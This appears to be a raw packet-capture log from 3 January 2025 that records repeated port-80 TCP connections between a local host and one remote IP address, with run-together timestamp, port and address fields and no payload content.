                                                                                                                                                                  Jan 3, 2025 09:07:40.519876957 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.519886017 CET4975980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:40.519908905 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.519926071 CET4975980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:40.519937038 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.519938946 CET4976080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:40.519959927 CET4975980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:40.519984961 CET4975980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:40.519989014 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.520040989 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.520050049 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.520100117 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.520103931 CET4975980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:40.520131111 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.520160913 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.520230055 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.520237923 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.520257950 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.520317078 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.520344973 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.520366907 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.520416021 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.524480104 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.524487972 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.524530888 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.524538040 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.524679899 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.524688005 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.524697065 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.524765015 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.524789095 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.524851084 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.524902105 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.524959087 CET804976086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.524966002 CET804976086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.525012970 CET804976086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.525021076 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.525032043 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.525105953 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.525114059 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.525140047 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.525190115 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.525198936 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.525232077 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.722963095 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.816678047 CET4975980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:40.873821974 CET804976086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:40.926165104 CET4976080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:41.007142067 CET804976086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:41.100665092 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:41.129162073 CET4976080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:41.134069920 CET4975980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:41.134211063 CET4976080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:41.134428024 CET4976180192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:41.139280081 CET804975986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:41.139576912 CET804976186.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:41.139627934 CET4975980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:41.139655113 CET4976180192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:41.139717102 CET804976086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:41.139750957 CET4976180192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:41.139786005 CET4976080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:41.144479990 CET804976186.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:41.488652945 CET4976180192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:41.493612051 CET804976186.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:41.493626118 CET804976186.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:41.493633986 CET804976186.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:41.846468925 CET804976186.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:41.894789934 CET4976180192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:41.979756117 CET804976186.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:42.097172976 CET4976180192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:42.097470999 CET4976280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:42.102263927 CET804976286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:42.102341890 CET4976280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:42.102443933 CET4976280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:42.103764057 CET804976186.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:42.103811979 CET4976180192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:42.107198954 CET804976286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:42.457386971 CET4976280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:42.462301970 CET804976286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:42.462315083 CET804976286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:42.462326050 CET804976286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:42.791832924 CET804976286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:42.922086954 CET804976286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:42.925468922 CET4976280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:43.050911903 CET4976380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:43.055799007 CET804976386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:43.057517052 CET4976380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:43.057610035 CET4976380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:43.062443972 CET804976386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:43.410531998 CET4976380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:43.415477037 CET804976386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:43.415488005 CET804976386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:43.415496111 CET804976386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:43.753654003 CET804976386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:43.801037073 CET4976380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:43.881896019 CET804976386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:43.929058075 CET4976380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:44.003262043 CET4976380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:44.003607035 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:44.008799076 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:44.008873940 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:44.008955002 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:44.009000063 CET804976386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:44.009052038 CET4976380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:44.013889074 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:44.363631964 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:44.368554115 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:44.368565083 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:44.368571997 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:44.426745892 CET4976580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:44.427067041 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:44.431617022 CET804976586.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:44.431714058 CET4976580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:44.431796074 CET4976580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:44.436542988 CET804976586.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:44.475291967 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:44.546490908 CET4976680192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:44.551255941 CET804976686.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:44.553481102 CET4976680192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:44.553587914 CET4976680192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:44.558418989 CET804976686.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:44.598717928 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:44.601520061 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:44.785984993 CET4976580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:44.793461084 CET804976586.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:44.794501066 CET804976586.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:44.910571098 CET4976680192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:44.915499926 CET804976686.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:44.915508986 CET804976686.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:44.915513039 CET804976686.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:45.137269974 CET804976586.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:45.191667080 CET4976580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:45.235955000 CET804976686.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:45.270196915 CET804976586.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:45.285459995 CET4976680192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:45.316664934 CET4976580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:45.370091915 CET804976686.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:45.426035881 CET4976680192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:45.549935102 CET4976580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:45.550003052 CET4976680192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:45.555963993 CET804976586.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:45.556025028 CET4976580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:45.556154966 CET804976686.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:45.556195974 CET4976680192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:45.568696022 CET4976780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:45.573549032 CET804976786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:45.573626041 CET4976780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:45.573724985 CET4976780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:45.578490973 CET804976786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:45.926117897 CET4976780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:45.931047916 CET804976786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:45.931057930 CET804976786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:45.931116104 CET804976786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:46.276850939 CET804976786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:46.394867897 CET4976780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:46.409938097 CET804976786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:46.535244942 CET4976880192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:46.535327911 CET4976780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:46.540133953 CET804976886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:46.540208101 CET4976880192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:46.540210009 CET804976786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:46.540260077 CET4976780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:46.541990042 CET4976880192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:46.546725035 CET804976886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:46.894891977 CET4976880192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:46.899784088 CET804976886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:46.899795055 CET804976886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:46.899802923 CET804976886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:47.232325077 CET804976886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:47.285434008 CET4976880192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:47.363889933 CET804976886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:47.410423994 CET4976880192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:47.486653090 CET4976880192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:47.486964941 CET4976980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:47.491555929 CET804976886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:47.491704941 CET4976880192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:47.491741896 CET804976986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:47.491807938 CET4976980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:47.491899014 CET4976980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:47.496619940 CET804976986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:47.808723927 CET804976286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:47.808785915 CET4976280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:47.848056078 CET4976980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:47.852946043 CET804976986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:47.852956057 CET804976986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:47.852966070 CET804976986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:48.195022106 CET804976986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:48.238569021 CET4976980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:48.328520060 CET804976986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:48.379204988 CET4976980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:48.458765984 CET4976980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:48.459122896 CET4977080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:48.463809967 CET804976986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:48.463880062 CET4976980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:48.463886976 CET804977086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:48.463943005 CET4977080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:48.464046955 CET4977080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:48.468826056 CET804977086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:48.816776037 CET4977080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:48.821680069 CET804977086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:48.821690083 CET804977086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:48.821701050 CET804977086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:49.140012026 CET804977086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:49.191689014 CET4977080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:49.269925117 CET804977086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:49.316817999 CET4977080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:49.393121958 CET4977080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:49.393127918 CET4977180192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:49.397965908 CET804977186.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:49.398047924 CET4977180192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:49.398113012 CET804977086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:49.398164034 CET4977080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:49.399144888 CET4977180192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:49.403939962 CET804977186.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:49.754292965 CET4977180192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:49.759187937 CET804977186.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:49.759198904 CET804977186.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:49.759206057 CET804977186.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:50.080612898 CET804977186.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:50.130484104 CET4977180192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:50.210144043 CET804977186.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:50.254190922 CET4977180192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:50.292090893 CET4977280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:50.292155981 CET4977180192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:50.296926975 CET804977286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:50.297013998 CET4977280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:50.297120094 CET804977186.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:50.297130108 CET4977280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:50.297168970 CET4977180192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:50.301943064 CET804977286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:50.390909910 CET4977380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:50.391041994 CET4977280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:50.395709991 CET804977386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:50.395783901 CET4977380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:50.403146982 CET4977380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:50.407912016 CET804977386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:50.439234018 CET804977286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:50.754406929 CET4977380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:50.760488033 CET804977386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:50.760499001 CET804977386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:50.760507107 CET804977386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:50.783691883 CET804977286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:50.783747911 CET4977280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:51.098463058 CET804977386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:51.144814968 CET4977380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:51.229823112 CET804977386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:51.269826889 CET4977380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:51.352745056 CET4977380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:51.353081942 CET4977480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:51.357842922 CET804977386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:51.357901096 CET4977380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:51.357930899 CET804977486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:51.357992887 CET4977480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:51.358062983 CET4977480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:51.362864017 CET804977486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:51.707441092 CET4977480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:51.712412119 CET804977486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:51.712424040 CET804977486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:51.712433100 CET804977486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:52.058923960 CET804977486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:52.113639116 CET4977480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:52.190211058 CET804977486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:52.238553047 CET4977480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:52.312490940 CET4977480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:52.312556028 CET4977680192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:52.317465067 CET804977686.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:52.317476988 CET804977486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:52.317554951 CET4977480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:52.317568064 CET4977680192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:52.317703009 CET4977680192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:52.322432041 CET804977686.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:52.695858002 CET4977680192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:52.700778008 CET804977686.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:52.700788021 CET804977686.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:52.700793028 CET804977686.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:52.994966030 CET804977686.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:53.035434008 CET4977680192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:53.122051954 CET804977686.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:53.176071882 CET4977680192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:53.250569105 CET4977680192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:53.250916958 CET4977780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:53.255654097 CET804977686.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:53.255701065 CET4977680192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:53.255724907 CET804977786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:53.255785942 CET4977780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:53.255954981 CET4977780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:53.260729074 CET804977786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:53.613744974 CET4977780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:53.618626118 CET804977786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:53.618637085 CET804977786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:53.618643999 CET804977786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:53.947146893 CET804977786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:54.019823074 CET4977780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:54.077030897 CET804977786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:54.129220009 CET4977780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:54.206362009 CET4977780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:54.206443071 CET4977880192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:54.211261988 CET804977886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:54.211363077 CET804977786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:54.211431980 CET4977780192.168.2.486.110.194.28
